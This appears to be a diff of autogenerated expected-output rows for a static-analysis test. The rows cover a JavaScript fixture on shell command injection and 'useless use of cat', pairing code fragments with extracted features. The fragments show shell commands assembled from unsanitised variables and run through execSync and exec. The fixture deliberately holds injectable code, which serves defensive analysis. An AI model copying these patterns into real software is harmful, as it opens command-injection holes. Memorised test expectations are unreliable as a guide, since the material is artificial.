+| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:17:40:23 | newpath | stringConcatenatedWith | 'cat ' -endpoint- ' > ' + destpath | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:25:40:27 | > | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:25:40:27 | > | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:25:40:27 | > | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:25:40:27 | > | stringConcatenatedWith | 'cat ' + newpath -endpoint- destpath | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:30:40:37 | destpath | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:30:40:37 | destpath | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:30:40:37 | destpath | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:30:40:37 | destpath | stringConcatenatedWith | 'cat ' + newpath + ' > ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:42:40:49 | toString | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:42:40:49 | toString | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:40:42:40:49 | toString | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:1:42:8 | execSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:1:42:8 | execSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:1:42:8 | execSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:1:42:47 | exceptional return of execSyn ... File}`) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:1:42:47 | exceptional return of execSyn ... File}`) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:1:42:47 | exceptional return of execSyn ... File}`) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:1:42:47 | execSyn ... File}`) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:1:42:47 | execSyn ... File}`) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:1:42:47 | execSyn ... File}`) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:10:42:46 | `cat ${ ... tFile}` | CalleeFlexibleAccessPath | execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:10:42:46 | `cat ${ ... tFile}` | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:10:42:46 | `cat ${ ... tFile}` | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:10:42:46 | `cat ${ ... tFile}` | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:10:42:46 | `cat ${ ... tFile}` | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:10:42:46 | `cat ${ ... tFile}` | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:11:42:14 | cat | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:11:42:14 | cat | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:11:42:14 | cat | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:11:42:14 | cat | stringConcatenatedWith | -endpoint- files.join() + ' > ' + outFile | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:17:42:21 | files | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:17:42:21 | files | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:17:42:21 | files | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:17:42:26 | files.join | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:17:42:26 | files.join | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:17:42:26 | files.join | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:17:42:31 | exceptional return of files.join(' ') | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:17:42:31 | exceptional return of files.join(' ') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:17:42:31 | exceptional return of files.join(' ') | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:17:42:31 | files.join(' ') | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:17:42:31 | files.join(' ') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:17:42:31 | files.join(' ') | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:17:42:31 | files.join(' ') | stringConcatenatedWith | 'cat ' -endpoint- ' > ' + outFile | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:23:42:26 | join | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:23:42:26 | join | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:23:42:26 | join | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:28:42:30 | ' ' | CalleeFlexibleAccessPath | files.join | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:28:42:30 | ' ' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:28:42:30 | ' ' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:28:42:30 | ' ' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:28:42:30 | ' ' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:28:42:30 | ' ' | receiverName | files | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:33:42:35 | > | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:33:42:35 | > | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:33:42:35 | > | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:33:42:35 | > | stringConcatenatedWith | 'cat ' + files.join() -endpoint- outFile | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:38:42:44 | outFile | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:38:42:44 | outFile | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:38:42:44 | outFile | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:42:38:42:44 | outFile | stringConcatenatedWith | 'cat ' + files.join() + ' > ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:1:44:8 | execSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:1:44:8 | execSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:1:44:8 | execSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:1:44:34 | exceptional return of execSyn ... ' ')}`) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:1:44:34 | exceptional return of execSyn ... ' ')}`) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:1:44:34 | exceptional return of execSyn ... ' ')}`) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:1:44:34 | execSyn ... ' ')}`) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:1:44:34 | execSyn ... ' ')}`) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:1:44:34 | execSyn ... ' ')}`) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:10:44:33 | `cat ${ ... (' ')}` | CalleeFlexibleAccessPath | execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:10:44:33 | `cat ${ ... (' ')}` | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:10:44:33 | `cat ${ ... (' ')}` | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:10:44:33 | `cat ${ ... (' ')}` | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:10:44:33 | `cat ${ ... (' ')}` | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:10:44:33 | `cat ${ ... (' ')}` | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:11:44:14 | cat | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:11:44:14 | cat | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:11:44:14 | cat | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:11:44:14 | cat | stringConcatenatedWith | -endpoint- files.join() | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:17:44:21 | files | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:17:44:21 | files | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:17:44:21 | files | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:17:44:26 | files.join | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:17:44:26 | files.join | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:17:44:26 | files.join | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:17:44:31 | exceptional return of files.join(' ') | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:17:44:31 | exceptional return of files.join(' ') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:17:44:31 | exceptional return of files.join(' ') | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:17:44:31 | files.join(' ') | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:17:44:31 | files.join(' ') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:17:44:31 | files.join(' ') | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:17:44:31 | files.join(' ') | stringConcatenatedWith | 'cat ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:23:44:26 | join | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:23:44:26 | join | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:23:44:26 | join | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:28:44:30 | ' ' | CalleeFlexibleAccessPath | files.join | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:28:44:30 | ' ' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:28:44:30 | ' ' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:28:44:30 | ' ' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:28:44:30 | ' ' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:44:28:44:30 | ' ' | receiverName | files | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:46:1:46:4 | exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:46:1:46:4 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:46:1:46:4 | exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:46:1:46:37 | exceptional return of exec("c ... name") | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:46:1:46:37 | exceptional return of exec("c ... name") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:46:1:46:37 | exceptional return of exec("c ... name") | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:46:1:46:37 | exec("c ... name") | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:46:1:46:37 | exec("c ... name") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:46:1:46:37 | exec("c ... name") | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:46:6:46:36 | "cat /p ... p name" | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:46:6:46:36 | "cat /p ... p name" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:46:6:46:36 | "cat /p ... p name" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:46:6:46:36 | "cat /p ... p name" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:46:6:46:36 | "cat /p ... p name" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:46:6:46:36 | "cat /p ... p name" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:1:48:8 | execSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:1:48:8 | execSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:1:48:8 | execSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:1:48:41 | exceptional return of execSyn ... tool}`) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:1:48:41 | exceptional return of execSyn ... tool}`) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:1:48:41 | exceptional return of execSyn ... tool}`) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:1:48:41 | execSyn ... tool}`) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:1:48:41 | execSyn ... tool}`) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:1:48:41 | execSyn ... tool}`) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:10:48:40 | `cat ${ ... rtool}` | CalleeFlexibleAccessPath | execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:10:48:40 | `cat ${ ... rtool}` | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:10:48:40 | `cat ${ ... rtool}` | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:10:48:40 | `cat ${ ... rtool}` | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:10:48:40 | `cat ${ ... rtool}` | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:10:48:40 | `cat ${ ... rtool}` | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:11:48:14 | cat | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:11:48:14 | cat | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:11:48:14 | cat | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:11:48:14 | cat | stringConcatenatedWith | -endpoint- newpath + ' \| ' + othertool | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:17:48:23 | newpath | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:17:48:23 | newpath | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:17:48:23 | newpath | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:17:48:23 | newpath | stringConcatenatedWith | 'cat ' -endpoint- ' \| ' + othertool | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:25:48:27 | \| | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:25:48:27 | \| | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:25:48:27 | \| | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:25:48:27 | \| | stringConcatenatedWith | 'cat ' + newpath -endpoint- othertool | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:30:48:38 | othertool | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:30:48:38 | othertool | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:30:48:38 | othertool | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:48:30:48:38 | othertool | stringConcatenatedWith | 'cat ' + newpath + ' \| ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:1:50:0 | execSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:1:50:0 | execSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:1:50:0 | execSync | enclosingFunctionBody | file execSync cat file toString | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:1:50:0 | execSync | enclosingFunctionName | cat | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:1:50:0 | execSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:1:50:0 | this | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:1:50:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:1:50:0 | this | enclosingFunctionBody | file execSync cat file toString | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:1:50:0 | this | enclosingFunctionName | cat | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:1:50:0 | this | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:1:52:1 | 'arguments' object of function cat | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:1:52:1 | 'arguments' object of function cat | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:1:52:1 | 'arguments' object of function cat | enclosingFunctionBody | file execSync cat file toString | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:1:52:1 | 'arguments' object of function cat | enclosingFunctionName | cat | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:1:52:1 | 'arguments' object of function cat | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:1:52:1 | exceptional return of function cat | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:1:52:1 | exceptional return of function cat | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:1:52:1 | exceptional return of function cat | enclosingFunctionBody | file execSync cat file toString | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:1:52:1 | exceptional return of function cat | enclosingFunctionName | cat | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:1:52:1 | exceptional return of function cat | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:1:52:1 | functio ... OT OK\\n} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:1:52:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:1:52:1 | functio ... OT OK\\n} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:1:52:1 | return of function cat | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:1:52:1 | return of function cat | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:1:52:1 | return of function cat | enclosingFunctionBody | file execSync cat file toString | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:1:52:1 | return of function cat | enclosingFunctionName | cat | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:1:52:1 | return of function cat | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:10:50:12 | cat | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:10:50:12 | cat | contextSurroundingFunctionParameters | (file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:10:50:12 | cat | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:14:50:17 | file | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:14:50:17 | file | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:14:50:17 | file | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:14:50:17 | file | contextSurroundingFunctionParameters | (file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:14:50:17 | file | enclosingFunctionBody | file execSync cat file toString | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:14:50:17 | file | enclosingFunctionBody | file execSync cat file toString | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:14:50:17 | file | enclosingFunctionName | cat | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:14:50:17 | file | enclosingFunctionName | cat | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:50:14:50:17 | file | fileImports | child_process cross-spawn exec express fs shelljs | +| 